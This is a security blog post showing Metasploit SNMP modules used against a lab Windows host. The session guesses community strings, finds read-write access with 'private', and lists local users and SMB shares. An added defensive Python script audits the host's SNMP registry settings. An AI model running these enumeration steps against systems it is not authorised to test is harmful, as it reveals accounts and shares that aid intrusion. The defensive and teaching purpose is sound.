carnal0wnage [Shared Reader]

Wednesday, March 23, 2011

New SNMP Metasploit Modules

My new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against Windows hosts that have SNMP running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_set


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info

...SNIP...

Description:
  This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run

[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info

...SNIP...

Description:
  This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run

[+] 192.168.100.119
    backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
    MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
    NewBackup2 - (J:\NewBackup2)
    SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
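
For whoever owns a box like this one: an added example (not part of the original post) that audits the Windows SNMP service settings behind the snmp_login result above, using the output of `reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters /s` collected from the host. The sample registry text is constructed to mirror the host in the post; the READ ONLY right on 'public' is an assumption, since the post only reports READ-WRITE for 'private'.

```python
import re

# Access-right values the Windows SNMP service stores per community name.
RIGHTS = {1: "NONE", 2: "NOTIFY", 4: "READ ONLY", 8: "READ WRITE", 16: "READ CREATE"}
DEFAULT_NAMES = {"public", "private"}   # the two strings snmp_login found above
WRITABLE = {8, 16}

VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s+REG_(?P<type>DWORD|SZ)\s+(?P<data>\S.*)$")

def parse_reg_query(text):
    """Return {subkey_name: {value_name: data}} from `reg query /s` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = keys.setdefault(line.strip().rsplit("\\", 1)[-1], {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                data = m["data"].strip()
                current[m["name"]] = int(data, 16) if m["type"] == "DWORD" else data
    return keys

def audit(text):
    """List findings for default or writable communities and open manager lists."""
    keys = parse_reg_query(text)
    findings = []
    for name, rights in sorted(keys.get("ValidCommunities", {}).items()):
        label = RIGHTS.get(rights, hex(rights))
        if name.lower() in DEFAULT_NAMES:
            findings.append(f"default community '{name}' accepted ({label})")
        if rights in WRITABLE:
            findings.append(f"community '{name}' grants write access ({label})")
    if not keys.get("PermittedManagers"):
        findings.append("PermittedManagers is empty: SNMP accepted from any host")
    return findings

# Constructed sample (not captured from the post's host); public's right is assumed.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities
    public    REG_DWORD    0x4
    private    REG_DWORD    0x8

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("[!]", finding)
```

An empty findings list means no default or writable community is configured and SNMP requests are restricted to the listed managers.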
